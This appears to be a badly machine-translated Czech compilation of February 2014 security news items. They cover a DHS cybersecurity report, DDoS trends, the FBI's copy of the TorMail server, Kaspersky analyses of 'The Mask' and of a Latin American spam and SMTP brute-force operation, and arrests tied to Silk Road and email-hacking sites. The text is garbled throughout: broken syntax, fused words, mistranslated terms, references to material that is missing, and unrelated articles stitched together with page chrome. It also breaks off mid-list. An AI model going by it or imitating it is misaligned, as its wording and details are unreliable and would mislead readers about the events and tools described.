Slabá hesla a zřídka aktualizuje software jevracející se téma se za 48.000 kybernetických incidentů hlášených k ministerstvu pro vnitřní bezpečnost - včetně krádeže údajů o národních nejslabších přehrad ze strany " škodlivého vetřelce " , apřípad, kdy hackeři vysílání škodlivého varování o zombie útoku přes několik amerických televizních stanic ,zpráva DHS našel .

" Údaje o národních nejslabších přehrad , včetně těch, které by mohly zabít Američany , pokud se jim nepodařilo , byly ukradeny škodlivého vetřelce , "Zpráva s názvem spolkové vlády Track Záznam o kybernetické bezpečnosti a kritické infrastruktury " řekl , " důvěrné kybernetické plány jaderných elektráren " byly ponechány bez ochrany . Plány pro technologii podpírající na New York Stock Exchange byly vystaveny na hackery . "

Zpráva byla sestavena na základě informací z více než 40 předchozích šetřeních podle generálních inspektorů , podle zprávy Mashable je . Mashable popsal slabá hesla jako opakující se téma zprávy o 17 - stránku , a řekl, že " heslo " zůstáváobyčejná volba pro státní zaměstnance .

Zpráva poukázala na řadu porušení , včetně hlášených útoku na národní nouzového vysílacího systému , který vedl televizních stanic v Michiganu , Montana a Severní Dakota vysílat falešné varování zombie útoku . " Civilní úřady ve vašem okolí , uvádělo, že těla mrtvých stoupá z jejich hrobů a útočí na živobytí . Nepokoušejte se přiblížit nebo zatknout tyto orgány, které jsou považovány za velmi nebezpečné . "

Zpráva byla tupá o tom, kdo na vině : " skutečné poklesky " vládní zaměstnanci , včetně softwaru se řídí fyzický přístup k zabezpečení webů , které bylo několik let zastaralé , a " slabých nebo výchozí" hesel střežit servery , které obsahují citlivé informace . Zpráva citoval instanci 10 hesel napsaných dolů a vlevo na stoly v kanceláři Chief Information Officer pro US Immigration a Customs Enforcement .

Webové stránky včetně vlastní pro - bezpečnostní stránkách DHS " budovat bezpečnost v ' - postavený na podporu vývojářům , aby " " se budovat bezpečnost na software v každé fázi svého vývoje " - obsahovala také známé zranitelnosti , píše se ve zprávě . Republikánský senátor Tom Coburn , který předsedá výboru , řekl Washington Post : "Oni nejsou ani dělat jednoduché věci . "

Na jaderné regulační komise , "obecný nedostatek důvěry " vedla zaměstnance k nákupu a nasazení počítačových sítí bez znalosti vlastního IT personálu . Zpráva ZDNet je popsáno vládní weby a systémy jako " zralé slabin " .

Zpráva říká, že mnoho útoky bylyvýsledkem špatně aktualizovaný software , včetně software AV .

" Zatímco kybernetické útoky do chráněných systémů jsou obvyklevýsledkem sofistikovaného hackerství , které často využívají světské slabosti , zvláště out-of -date software , " píše se ve zprávě . " I přesto, že zvuk nudné , není-li nainstalovat softwarové záplaty nebo aktualizovat programy na jejich nejnovější verze vytvořit vstupní body pro špiony , hackery a dalšími škodlivými činiteli . Loni v červenci , hackeři používají právě tento druh znám, fixačního slabosti ukrást osobní informace o více než 100.000 lidí z ministerstva energetiky . Oddělení je generální inspektor obvinil krádež částečně na pieceofsoftware který nebyl aktualizován v průběhu dvou let , a to i přesto, že oddělení koupil upgrade . "

" Nedostatky ve federální vládě vlastní kybernetické bezpečnosti jsou ohroženy elektrickou síť , naše finanční trhy , naše systémy havarijního a osobní informace našich občanů , " řekl senátor Coburn v tiskové zprávě . " Zatímco politici chtěli navrhnout komplexní nové předpisy , masivní nové programy , a miliardy v novém výdajů na zlepšení kybernetické bezpečnosti , existuje velmi jednoduchý - a kriticky důležité - opatření, která by mohla chránit naši infrastrukturu a osobní údaje našich občanů , že jsme prostě nejsou dělá . "


Kdo by měl být odpovědný za ochranu vašeho soukromí online?
5.2.2014 Ochrana
Právě včas pro ochranu soukromých dat den, společnost Microsoft vydala výsledky průzkumu, který ukazuje postoje o ochraně osobních údajů technologických zdatné jednotlivce ve Spojených státech a čtyřech evropských zemích (Belgie, Francie, Německo a Velká Británie). Výzkum zjistil , že pro většinu část lidí má pocit, že mají omezenou kontrolu nad tím, jak se používá jejich dat on-line (53 procent času v USA a 43 procent času v Evropě) a mají zájem o pochopení toho, jak se jejich informace jsou použity. Tento infographic užitečně shrnuje výsledky.


Federálové klonovaný TorMail server s budoucí vyšetřování v mysli
5.2.2014 Bezpečnost
Uživatelé TorMail zapojená do nezákonné činnosti by se cítil víc než výčitky úzkosti, když bylo potvrzeno, loni v létě, že FBI převzala kontrolu svobody Hosting serverů. V každém případě, nedávno zveřejnil soud podání bude pravděpodobně dělat je velmi bojí. Freedom Hosting byl známý pro umožnění webové stránky zaměřené na dětskou pornografii musí být umístěn na svých serverech, ale také pro hostování právní služby, jako je TorMail, které sice mohou být použity pro účely páchání trestné činnosti . nově odhalené detaily o zabavení ukázaly, že několik týdnů před Freedom Hosting byla pořízena dolů, FBI přístup k serveru TorMail a udělal kopii. To je to, co nakonec jim umožnily objevit v reálném světě totožnost hlavní Provozovatel on-line padělaných karet e-shopu vypnout minulý týden. Muž, jeden Sean Roberts z Floridy, který se používá účet TorMail ( platplus@tormail.com ) jako záložní účet pro zpracování objednávek. "Mezi 22.července 2013 a 2.8.2013, v souvislosti s nepříbuzným trestního vyšetřování, FBI získat kopii počítačového serveru umístěném ve Francii prostřednictvím vzájemné právní požadavek Smlouvy o pomoc do Francie, která obsahovala údaje a informace z e-mailového serveru Tormail, včetně obsahu Tormail e-mailových účtů, "vysvětlil US Postal inspektor Eric Malecki v stížnost. "On nebo asi 24 září 2013, činných v trestním řízení získat povolení k domovní prohlídce pro vyhledávání obsahu Platplus Tormail účet, který pobýval na zabavené Tormail serveru." Co to ​​znamená, že tato zatčení jsou pravděpodobně jen začátek, jak že lze důvodně očekávat, že FBI bude kroužit zpět na klonované serveru, kdykoli se setkají účet TorMail při vyšetřování trestné činnosti. "taktika naznačuje FBI se přizpůsobuje věku big dat s NSA-stylu shromažďujeme-vše approach, shromažďování informací do virtuálního skříňce zámku, a zanechává ji tam, dokud se může získat určenému orgánu, aby na ni klepněte později, " poznamenal Wired Kevin Poulsen, s tím, že není důvod se domnívat, že FBI hledal server pro důkazu před získáním povolení k prohlídce . "Ale teď, že má kopii serverů TorMail je, úřad může provádět nekonečné domovní prohlídce na poštovní služby, které kdysi chlubil , že jsou imunní vůči špehování, ".


Blackholing efekt snižuje riziko kybernetický útok na regulovaném dat
5.2.2014 Počítačový útok
FireHost oznámila, trendy útoků je blokován z webových aplikací svých klientů ve 4. čtvrtletí 2013. Bezpečnostní experti si všimli, že nejnovější údaje Troj společnosti na pokus o kybernetických útoků by mohla poskytnout důkaz o "blackholing" efektu. Ve skutečnosti, blackholing efekt přispěl k celkovému počtu útoků filtrovat podle FireHost pádu z více než 17 m ve 3. čtvrtletí 2013 na méně než 9 m ve 4. čtvrtletí 2013.


"Pro každého, kdo se kybernetické bezpečnosti a detekce hrozeb nový, musí blackholing jev znít neuvěřitelně abstraktní," přiznává FireHost CEO Chris Drake. "Naštěstí, je to vlastně docela jednoduché a naše nejnovější statistiky jistě kvantifikovat pozitivní přínosy tento účinek má, pokud jde o ochranu regulovaných údajů." Jak blackholing účinek se projevuje ve virtualizované infrastruktuře se komplexních bezpečnostních vrstev, většina škodlivého provozu vidět a blokován pochází z zlovolných sítí a botnety. IP pověst filtr zachytí webového provozu na obvodové vrstvy a rozpozná, kdy rádoby útočník byl černý ho. To znamená, že, když zločinci spuštění webových útoků nebo provádět průzkum na velké kusy internetu od známých "špatných" IP adres, filtr IP pověst může zabránit jim v připojení k chráněné síti prostoru bez důvodu nebo reakci. Postupem času, černá díra je chráněná IP neviditelné útočníků. Jako výsledek, tyto webové aplikace jsou vystaveni méně a méně útoku provozu, zlepšení efektivity paměti a procesoru, stejně jako snížení dopravního zatížení sítě, abychom jmenovali alespoň některé výhody. Ze stejného důvodu, objem spamu a všeho ostatního associated s nelegitimních zdrojů také sníží. "V oblasti konfliktu, nepřátelé nemají střílet na stromy na off-šance, že je neuvěřitelně dobře maskované jednotky pěchoty okolí," vysvětlil výkonný ředitel společnosti FireHost , Chris Drake. "To je více či méně princip černé díry efektu. Pokud je automatizovaný útok zjistí mrtvého adresy, je pravděpodobné, že ji dále zkoumat. To se jednoduše přesunout na jiný, nový zranitelné cíle, a spustit stejný útok tam. " Hackeři přednost osvědčené Podle Chrise Hinkley, vedoucí bezpečnostní inženýr v FireHost, na skutečnost, že údaje za 4. čtvrtletí a 3. čtvrtletí 2013 byl tak Podobný vlastně říká hodně o současné kybernetické krajiny. A sice, že útočníci jsou v současné době méně nakloněn, a méně motivováni k vývoji nových metod útoku, nebo přinejmenším nejsou vytvářet nové škodlivé nástroje ve velkém měřítku. "Útočníci se stále používá relativně staré metody útoku, a to je snadné pochopit, proč, tam je velmi málo odpor ze strany potenciálních obětí a bezpečnostního průmyslu se snaží držet krok. Zatímco nové nástroje a metody doručení jsou vytvořeny pravidelně, nedávné narušení bezpečnosti osobních údajů, jako jsou likes utrpěl SnapChat a Target nesou důkaz, že staré-hat je stále dost dobrý. Bezpečnostní opatření a protiopatření nejsou postupuje rychlým tempem dost přinutit útočníky být neuvěřitelně inovativní. Existuje ještě mnoho potenciálních obětí náchylné k útoku za použití stejných starých využije a nástroje. "Dokud informační útočníci se snaží řádně chráněna, a my jsme se vymanili z status quo, bude vetřelci držet jejich příznivých útoky a to i jimi."


DDoS útoky staly chytřejší, rychlejší a přísnější
5.2.2014 Počítačový útok
DDoS útoky budou i nadále vážným problémem v roce 2014 - jako útočníci stále více agilní a jejich nástroje staly sofistikovanější, podle Radware. Jejich zpráva byla zpracována s využitím údajů z více než 300 případů a výkonný průzkum sestávající z osobních rozhovorů s 15 vysoce postavených bezpečnostních manažerů.

V roce 2013, stále více rozšířené DDoS útoky vedly ke škodlivým výpadky služby a degradace služby, kriticky narážejícího příjmů, spokojenost zákazníků a vnímání značky. . Útočníci se staly rychlejší porazit nově nasazené nástroje snižování Avi Chesla, CTO ve společnosti Radware řekl: "Osmdesát sedm procent našich respondentů se setkal problémy na úrovni služby z těchto stylem útoků. . Negativní dopad výpadku služby je již znám, ale i malé případy degradace služby mohou mít škodlivé a trvalé dopady na image značky organizace, spokojenosti zákazníků a nakonec i jeho spodním řádku " Klíčové závěry z této zprávy jsou: zhoršování Service je dost k přerušení podnikání. Šedesát procent respondentů uvedlo, že zažili degradaci služby kvůli útokům v roce 2013. I když to nemusí zdát tak škodlivé jako úplné vypnutí, studie ukazují, že 57 procent z on-line spotřebitelé budou opustit místo po uplynutí tři sekundy na stránku načíst a 80 procent z těch lidí, se už nevrátí. Pro servisní organizace založené, může to mít za následek okamžitou ztrátu příjmů. útočníci (rychle) oplatit. Útočníci se stále přizpůsobuje a porážet nové obranné protokoly realizované organizací s využitím nových vektorů útoku. Použití HTTP povodní útoky a nástroje, jako je "Kill 'em All", útočníci se dramaticky zkracuje cyklus zmírnění - někdy až několika hodin po zdroji byly nasazeny. DoS / DDoS útoky nechat cestu ničení. Zatímco silné útoky došlo v roce 2011 a 2012, celková intenzita útoků a procento těchto útoků s vysokým rizikem se zvýšila během posledních několika let. DDoS útoky na závažnosti vzrostl o 20 procent v roce 2013, v souladu s DoS / DDoS posouzení rizik skóre RadWare je. průmysl "Hit List" se rozpíná. Odvětví finančních služeb se připojí vládní organizace jako odvětví s nejvyšším rizikem útoků. Riziko pro finanční služby se zvýšily v důsledku hacktivist skupin provedení DDoS útoky - jako pokračování operace Ababil a ty na několika burzách Bitcoin - nejen pro destruktivní účely, ale také zároveň maskovat jiné vniknutí vedoucí k podvodné činnosti. Rizika útoků na web hosting společnosti a poskytovatelé internetových služeb také zvýšil v roce 2013. Nové útoky, jeden nebezpečný obecnosti. Výsledky průzkumu ukázaly, že útoky DNS jsou nyní druhý nejčastější způsob útoku organizace bojují, za DoS / DDoS. Jedná se o atraktivní pro útočníky díky jejich schopnosti generovat masivní provoz s omezenými zdroji a vícevrstvé architektury, která umožňuje sledování útočníky téměř nemožné. Kromě útoků DNS, ostatní útoku, také ukázal se jako významné otázky pro organizace. Šifrované útoky aplikací na bázi tvoří 50 procent všech internetových útoků. Web aplikace přihlašovací stránky byly hit na denní bázi, pro 15 procent organizací. "Útoky v roce 2014, nejsou zpomaluje. Ve skutečnosti, organizace, je třeba přijmout opatření nyní připravit své sítě - zejména ve finančních a vládního sektoru, "dodal Chesla. "Výsledky této zprávy jsou výzva k akci, a nejlepší způsob, jak bojovat proti kybernetickým útokům je třeba připravit a zapojit podporu odborníků kybernetické bezpečnosti." RadWare je ERT doporučuje následující opatření v zájmu předvídání a zmírňování následků útoků:

Zrychlete čas zmírnění. Organizace musí zajistit, že dokáže detekovat útoky a nasadit řešení zmírnění v nejkratším možném čase.
Připravte si deku pokrytí. S multi-vektorové DoS / DDoS útoky stále častější, organizace musí investovat do širší pokrytí útoku, který dokáže detekovat a chránit proti útokům všech typů a velikostí.
Zřídit jediné kontaktní místo. S buď interní bezpečnostní tým zaměstnaný s odborníky DoS / DDoS nebo externí tým, havarijní, který vám pomůže vybrat správné možnosti zmírnění má zásadní význam pro organizace, které v případě útoku.
DDoS přehled tipy

E-mailová adresa

Světlomet

Policie ransomware: mnohamilionové podnikání

Publikováno dne 5. února 2014. | Zločinci používají skutečné vymáhání práva agentura loga půjčovat oprávnění k jejich zprávy a donutit oběti na zaplacení výkupného, ​​aby odhalili jejich počítačů.

Denní strávit

Přihlášením do našeho ranního zpravodajského aktualizace, obdržíte denní výtah nejnovější bezpečnostní zprávy zveřejněné na Help Net Security.

Týdenní newsletter

s více než 500 otázek, tak daleko, čtení náš newsletter každé pondělí ráno vás udrží v up-to-data s bezpečnostní rizika tam.

Doporučené zdroje:
Zabezpečovací systémy detekce s Snort IDS: Pokročilé techniky Využití Snort, Apache, MySQL, PHP a kyselina
Chraňte svou síť pomocí Snort: vysoce výkonné, open source IDS. Snort dává správcům sítě otevřený systém detekce narušení zdroj, který překonává proprietární alternativy. >>
Open Space Security ™ Network Protection
Podívejte se, jak Kaspersky Lab nabízí novou flexibilitu pro zabezpečení sítě tím, že rozšíří mimo tradiční pracoviště pro ochranu stále distribuované pracovní síly. >>


Zlepšení důvěry v internetových služeb
5.2.2014 Bezpečnost
Agentura kybernetické bezpečnosti EU, ENISA, vydává řadu nových studií o současných bezpečnostních postupů poskytovatelů důvěryhodných služeb (TSPS) a doporučení pro zlepšení přeshraniční důvěryhodnost a interoperabilitu nových regulovaných TSPs a pro služby e-Government jejich použití . Secure vládní e-služby mají zásadní význam pro společnost, např. zdraví, zadávání veřejných zakázek, spravedlnosti. Bezpečnost je zásadní pro získání důvěry občanů EU o používání těchto služeb. Nicméně, existuje mnoho bezpečnostních problémů je třeba překonat, aby bylo zajištěno jejich úspěšné nasazení. Studie TSP zdůrazňuje, že:

Vzájemná pomoc systému mezi orgány dohledu v členských státech by měl být zřízen.
Aplikace na potřeby klienta, zajistit end-to-end šifrovanou komunikaci s TSPs a služeb elektronické veřejné správy v zájmu ochrany soukromí občanů EU.
Dokument e-Government používá několik Evropské komise financovaných rozsáhlých pilotních projektů, které integrují TSP (epSOS pro zdraví, e-CODEX pro spravedlnost a PEPPOL pro zadávání veřejných zakázek) jako případové studie. Tyto případy jsou použity k analýze stávající postupy a identifikovat mezery a kde lze provést změny k lepšímu. V této zprávě, problémy agentura podrobných technických bezpečnostních postupů, doporučení pro TSP a služeb e-governmentu jejich použití, včetně časové značky, e-dodávky, dlouhý . Doba uchovávání a ověřování e-podpis Hlavní doporučení určená nabídnout důvěryhodné e-Government služeb pro občany EU patří:

Podporovat důvěryhodné značky posuzovány s ohledem na požadavky eIDAS, že by být uznány za hranicemi.
Důvěra služby by měly být rozvíjeny v evropském měřítku, v souladu s EU i místní legislativou.
Zvláštní normy Business Continuity managementu by měla být přijata v poskytování důvěryhodných služeb (podle TSPs) a požadavků zákazníka e-Government. / Li>
Na kritičnosti e-governmentu základě, měly by vždy posoudit tři aspekty:
síla mechanismů ověřování, které mají být použity, podpoří využívání elektronického podpisu.
potřeba end-to-end šifrování a
potřeba revizních aby elektronické důkazy.
Pokyny pro poskytovatele důvěryhodných služeb poskytnout doporučení v oblasti právního a regulačního rámce TSPs, hodnocení rizik pro TSPs a zmírnění bezpečnostních incidentů. Hlavními body zvýrazněné zprávy patří:
právní úkony v rámci EU a na vnitrostátní úrovni
k dispozici normy platné věřit služby
procesy pro efektivní řízení rizik na TSPs
manipulace bezpečnostních incidentů v TSPs, jako zosobnění, ohrožení certifikačním úřadem, organizační selhání, atd.
Výkonný ředitel agentury ENISA, profesor Udo Helmbrecht, prohlásil: "Je nezbytné, aby podniky a vlády po celé Evropě, aby občané důvěřují své on-line služby, a proto realizovat nejlepší řešení technických e-podpis. Tyto osvědčené postupy musí být průběžně vyhodnocován prostřednictvím častého analýzy rizik, aby bylo možné udržet krok s technickým vývojem a překonání vyvíjející počítačové bezpečnostní výzvy. " Celé zprávy jsou k dispozici zde .


Pohled Behind "The Mask"
4.2.2014 Bezpečnost

Svět APTS je barevné místo. V roce 2012, jsme odhalili Flame, masivní cyberespionage operaci pronikající počítačů na Blízkém východě. Náš výzkum ukázal souvislost s dobře známým Stuxnet cyberweapon, navržen tak, aby sabotovat íránský jaderný program.
Na začátku roku 2013 jsme oznámili náš výzkum na RedOctober , a cyberespionage provozu se zaměřením na diplomatických institucí. V červnu 2013 jsme vydali náš výzkum na NetTraveler , a v září, náš výzkum na Kimsuky útoky.

Naše analýza všech těchto různých APT operace indikována jedinečnou používání jazyků, které nabízejí vodítko, pokud jde o některé z lidí za těchto operací. Pokud připomínky v plameni C & C byly psány v angličtině, artefakty v RedOctober uvedeno ruské reproduktory, NetTraveler uvedeno čínské domorodce. Konečně, Kimsuky uvedeno korejské mluvící autory, které jsme v souvislosti s KLDR.

Během posledních měsíců jsme byli zaneprázdněni analýzy ještě další sofistikované cyberespionage operace, která trvá již nejméně od roku 2007, infikovat obětí v 27 zemích. Z důvodů, které mají být vysvětleny později jsme tuto operaci "masky" považuje.

"Maska" je využití high-end využije, velmi sofistikovaný malware, který obsahuje bootkit a rootkit, Mac a Linux verze a vlastní útok produktů Kaspersky. To je jejich uvedení výše Duqu z hlediska propracovanosti, dělat to jeden z nejvyspělejších hrozeb v tuto chvíli.

Nejzajímavější, autoři se zdá být nativní ještě v jiném jazyce, který byl pozorován velmi vzácně v APT útoků.


Velký box LatAm hack (2. část - Email brute-force a spam)
4.2.2014 Spam | Bezpečnost

Pro doplnění již zmíněné závěry, server To samé cybercriminal obsahuje další zajímavé věci, ale před zmínku je, chci dát trochu více informací o e-mailové databáze, do spam obětí, aby jim infikovat s Betabot malware. E-mail databáze , jak velký je seznam e-mailových adres do spam obětí? Má 8689196 různé adresy. Je to velmi kompletní databáze. I když jen 10% strojů lidí v tomto seznamu nakazit, zločinci by získat více než 800 tisíc infikovaných počítačů! zeměpisné rozložení e-mailů je již publikován zde . Pokud se podíváme na čísla z nejzajímavějších oblastí, které patří do vlády, vzdělávací instituce a tak slouží k spam a nakazit, jsou stále velmi vysoká čísla:

Počet domén e-mailů
org 13772
edu 2015
gov 1575
plivanec 312

Spamování techniky
Většina spamu dnes poslal botnetů, ale to není to, co gang za tento server používá. V tomto případě, spamy jsou odesílány prostřednictvím aplikace s názvem " spam.exe " [cesta] / filename MD5 součet -------------------------- -------------------------------------------------- --- spam.exe dd77b464356a7c9de41377004dd1fa35 Když je spuštěn, budete požádáni o zadání hesla (viz níže) a pak potřebuje speciální parametr, který je prostý textový soubor.

Původní soubor parametrů je tento:

Přijímá parametry, jako je počet vláken , ze , předmět , tělo zprávy, souboru pro upevnění, Reply-To a smtp serveru, který chcete použít. Tam je řetězec uvnitř zkompilovaný kód směřující ke zdrojům projektu: j: \ hack \ dev \ spam \ spam \ obj \ Release \ spam.pdb Když byl tento server objevil, zločinci již příští Napsat připraven k odeslání jejich oběti:

Překlad ze španělštiny: "Uživatel, Z: 519825 **** přítel právě vám poslal zprávu MMS přes webové stránky Claro, zpráva bude automaticky odstraněna v 72 hodin. Stáhněte si zprávu nyní. ID:. CLARO, LA RED [Network], kde je všechno možné, "

Původní škodlivý URL vložené do zprávy je toto:

Jak jsem již zmínil, poslední parametr "spam.exe" škodlivý mailer je smtp serveru. Počítačoví zločinci se shromažďují 2093 různých nejsou správně zajištěné e-mailové servery po celém světě. To zahrnuje e-mailové servery z Číny, USA, Japonsku, Indonésii, Rusku, Itálii, Rumunsku, Nizozemsku, Německu, Bělorusku, Kazachstánu, Vietnamu, Hongkongu, Irsku, Brazílie, Řecka, Chile, Česká republika, Belgie, Filipín, Dánsku, Švédsku , Ukrajina, Maďarsko, Kanada, Malajsie, Polsko, Peru, Tchaj-wan, Francie, Jižní Korea, Španělsko a mnoho dalších.

Jak se zločinci získat tolik špatne serverů z celého světa? KISS To je název modulu použité k pokusu SMTP servery, pokud tito mají výchozí účty se stejnými výchozími hesly. Jinými slovy, jedná se o hrubou silou aplikace testovat SMTP spojení. [cesta] / filename MD5 součet ---------------------------- -------------------------------------------------- - kiss.exe 3a5d79a709781806f143d1880d657ba2 To je aplikace postavená uvnitř téhož projektu, řetězec z kódu to potvrzuje: J: \ hack \ dev \ brut \ obj \ x86 \ Release \ kiss.pdb Jakmile běží, budete požádáni o heslo , což je stejné jako v případě "spam.exe" aplikace. Přijímá čtyři parametry: nitě , IPS , loginy / hesla a e-mailové .

Když jsem zjistil, tyto zdroje, zločinci měli v IPS parametr souborů 1.519.403 IP adresy ve frontě na hrubou silou!

Zatímco seznam přihlášení / hesel měl následující kombinace:

Jedna zajímavá věc je, že zločinci nechtěl brute-force všechno a všechny domény tak, aby obsahoval seznam výjimek, které umožňuje " kiss.exe ", přeskočit a ne brute-force další domény:

Domény vyloučené z brute-nutit

Vypadá to, že prostě nechtěli přitahovat příliš pozornosti, především od vlád, zatímco brute-nutí. Už jsem najít další zajímavé věci na tomto serveru? Ano, a budu psát, že v příštím a posledním dílu seriálu Big Box Latam Hack. Kaspersky Anti-Virus detekuje "spam.exe" a "kiss.exe" jako E-mailové Flooder.MSIL.Agent.r a HackTool. MSIL.BruteForce.ba resp. Závěry Počítačoví zločinci z různých oblastí může pracovat v podobné, ale přesto různými způsoby. Tento případ je dobrým příkladem, jak to ukazuje, jak zločinci z Latinské Ameriky, bez přístupu k zombie strojů, snažil se najít co nejvíce slabých definované SMTP servery jsou možné po celém světě k distribuci spamu. Tato technika nesnížila jejich potenciální dosah, pokud jde o počet obětí, ani jejich geografické umístění. Někdy jednoduché "řešení" pracovat efektivně a my - jako výzkumní pracovníci -. Nemají pouze soustředit na botnet podobné činnosti Jak bylo uvedeno v předchozím příspěvku, tam je důkaz zločinci z Jižní Ameriky jsou v kontaktu s zločinci z východní Evropy a nejhorší část je, že používáte smíšené techniky:.


Bývalý zaměstnanec NSA pomáhá šifrovat e-maily

4.2.2014 Šifrování
Bývalý pracovník americké agentury NSA se spojil s dalšími vývojáři a představil nový software, který by měl e-maily šifrovat tak bezpečně, že se k nim nikdo nedostane.

E-mail, stále možná nejvíce využívaná aplikace na internetu, je bezpečný asi tak jako pohlednice. Na rozdíl od pohlednicí na něm jsou však závislé i velké firmy. Při vývoji e-mailu se na bezpečnost moc nehledělo – byl navržen prostě jen tak, aby fungoval. Po zveřejnění špionážních skandálů, kdy vyšlo najevo, že (nejen) americká NSA odposlouchává konverzaci snad všemi možnými způsoby, řada firem vidí v zabezpečení e-mailu byznys.

Jak tvrdí majitelé společností Wickr a Silent Circle, šifrovací software sice dostupný je, ale je příliš složitý. Tyto společnosti proto spojily své síly a vyvinuly open-source software s názvem Virtru, který by měl problémy okolo šifrování emailů vyřešit. „S Virtru můžete posílat komukoli cokoli a on se k tomu bude schopný dostat i bez toho, aby měli doktorát z IT,“ říká Will Ackerly z Virtru.

Velká výhoda Virtru je, že spolupracuje s Gmailem, Outlookem, Yahoo a ke svému fungování nevyžaduje externího klienta. Obsah v těle emailu je ihned zašifrován, takže Gmail, který automaticky ukládá návrhy nových zpráv, vidí pouze šifrovaný obsah. Odesílatel si jen musí nainstalovat rozšíření prohlížeče, které se stará o šifrování a dešifrování obsahu. Tento proces se odehrává na počítači/mobilním zařízení uživatele, takže poskytovatelé webmailů vidí jen šifrovaný obsah. Příjemce rozšíření instalovat nemusí a může si přečíst dešifrovaný obsah ve speciálním okně.

Tělo zprávy je šifrováno za pomoci Trusted Data Format (TDF), který Ackerly navrhl v roce 2008, když ještě sám pracoval pro NSA. Na rozdíl od jiných šifrovacích programů jako třeba PGP, umožňuje TDF šifrovat také přílohy. I když říci, že je něco šifrované, zní jednoduše, v celém procesu je třeba vyřešit řadu technických zádrhelů. Problém může nastat například tehdy, když soud firmě nakáže, aby odevzdala šifrovací klíč. To se stalo americké společnosti Lavabit, která poskytuje e-mailové služby také Edwardovi Snowdenovi. Virtru to řeší tak, že generuje nový klíč pro každý e-mail a po jeho odeslání je tento klíč zrušen.

Pokud by Virtru někdo přikázal SSL klíč zveřejnit, nebylo by to k ničemu platné, jelikož „nikdo by nebyl schopen konverzace dešifrovat.“ Základní funkce Virtru jako šifrování mailů nebo možnost kontrolovat jejich přeposílání budou bezplatné. Platit budou pouze firmy za korporátní licence. Pracuje se i na mobilních klientech pro Android a iOS.


Federálové zatčení Bitcoin Foundation místopředsedu a Bitcoin výměník
3.2.2014 Bezpečnost
Americké ministerstvo spravedlnosti oznámil zatčení a rozpečetění obvinění na Manhattanu federálního soudu proti Robert Faiella (také známý jako "BTCKing"), podzemní Bitcoin výměníku, a Charlie SHREM, generální ředitel a Compliance Officer Bitcoin Kurzy společnosti, pro zapojení do systému prodat více než 1 milion dolarů na Bitcoins pro uživatele "Silk Road".

SHREM byl zatčen v neděli na John F. Kennedy mezinárodní letiště v New Yorku. Faiella byl zatčen v pondělí v jeho rezidenci v Cape Coral na Floridě. Podle tvrzení obsažených v trestním stížnosti neuzavřených dnes na Manhattanu federálního soudu: Od Zhruba v prosinci 2011 do října 2013 Faiella běžel podzemní výměnu Bitcoin na internetových stránkách Silk Road, . webové stránky, které slouží jako rozlehlé a anonymní černý trh bazaru, kde byly koupeného a prodaného nelegální drogy prakticky každé odrůdy se pravidelně uživateli lokality Ovládání pod uživatelským jménem "BTCKing," prodal Faiella Bitcoins - jediná forma platby přijímány na Hedvábné stezce - pro uživatele, kteří chtějí koupit nelegální léky na místě. Po obdržení objednávky na Bitcoins od uživatele Silk Road, naplnil objednávky přes společnost se sídlem v New Yorku. Společnost byla navržena tak, aby zákazníci mohli vyměnit peníze na Bitcoins anonymně, to znamená, aniž by poskytovat žádné osobní identifikační údaje, a to účtován poplatek za své služby. Faiella získat Bitcoins s pomocí společnosti, a pak prodal Bitcoins pro uživatele Silk Road na značky. SHREM je generální ředitel společnosti, a asi od srpna 2011 až do asi července 2013, kdy společnost ukončila provoz, on byl také jeho Compliance Officer, odpovědný za dodržování společnosti s federální a druhé proti legalizaci výnosů z trestné činnosti ("praní peněz") zákony. SHREM je také místopředsedou Bitcoin Foundation, která se věnuje podpoře Bitcoin virtuální měnový systém. SHREM, který osobně koupil drogy na Hedvábné stezce, si byl plně vědom, že Silk Road je webová stránka s drogami, a přes jeho komunikace s Faiella , SHREM také věděl, že Faiella bylo provozování směnárenské služby Bitcoin pro uživatele Silk Road. Nicméně, SHREM vědomě usnadnit podnikání Faiella je se společností v zájmu zachování podnikání Faiella je jako lukrativní zdroj příjmů firmy. SHREM vědomě povoleno Faiella využít služeb společnosti koupit Bitcoins pro své zákazníky Silk Road, osobně zpracovaných Faiella rozkazy, dával slevy Faiella na jeho velkoobjemových transakcí, nedokázal podat jedinou podezřelou zprávu o činnosti s ministerstva financí Spojených států o Faiella ilegálního činnost, jako byl jinak povinen dělat v jeho roli jako společnosti Compliance Officer, a záměrně pomohl Faiella obejít omezení AML společnosti, i když to bylo SHREM je úkolem je prosazovat, a to i přesto, že společnost byla zaregistrována u ministerstva financí jako peníze služby pro obchodníky. Pracovní dohromady, SHREM a Faiella vyměnili přes 1 milion dolarů v hotovosti na Bitcoins ve prospěch uživatelů Silk Road, aby uživatelé mohli na oplátku, aby nelegální nákupy na Hedvábné stezce. Koncem roku 2012, kdy společnost zastavila přijímání plateb v hotovosti, Faiella přestal podnikat se společností a dočasně vypnout jeho ilegální výměny Bitcoin služby na Hedvábné stezce. Faiella obnovil provoz na Hedvábné stezce v dubnu 2013 bez pomoci společnosti, a pokračovaly ve výměně desítky tisíc dolarů týdně v Bitcoins do webové stránky Silk Road byl vypnut činnými v trestním řízení v říjnu 2013. Každý obžalovaný obviněn ze spiknutí s cílem spáchat praní špinavých peněz, a provozování nelicencované peníze vysílací podnikání. SHREM je také obviněn z vědomě nedaří podat jakékoli podezřelé zprávu o činnosti regarding protiprávní transakce Faiella prostřednictvím Společnosti v porušení zákona o bankovním tajemství.


Provozovatelé e-mailových hackerských webových stránek zatčeni v USA, Číně, Rumunsku
3.2.2014 Kriminalita
V rámci mezinárodní operace vymáhání práva zahrnující Rumunsko, Indie a Číny, USA federální prokurátoři obvinili dva operátory a Spojené státy se sídlem v e-hacking webových stránkách, stejně jako tři zákazníky z jiných webových stránkách hackerských se sídlem v jiných zemích, se počítačového podvodu trestné činy. Mark Anthony Townsend, 45, z Cedarville, Arkansas, a Joshua Alan Tábor, 29, z Prairie Grove, Arkansas, údajně provozoval e-mail hacking webové stránky needapassword.com . Podle soudních dokumentů, zákazníci na webových stránkách provozovaných Townsend a Tábor za předpokladu, názvy e-mailových účtů, a Townsend a Tábor by získat hesla na těchto účtech. Zákazníci z platby na PayPal účty a téměř 6000 e-mailových účtů byly ovlivněny systému. Ostatní tři obžalovaní zpoplatněny tento týden každý čelí přestupků na pronájem počítačových hackerů. Tito zákazníci, kteří čelí až na jeden rok ve federálním vězení, jsou:

John Ross Jesenský, 30, Northridge, Kalifornie, kdo zaplatil 21.675 dolar na čínské webové stránky dostat e-mailového účtu hesla
Laith Nona, 31, Troy, Michigan, který zaplatil přibližně 1081 dolar, aby se e-mailového účtu hesla

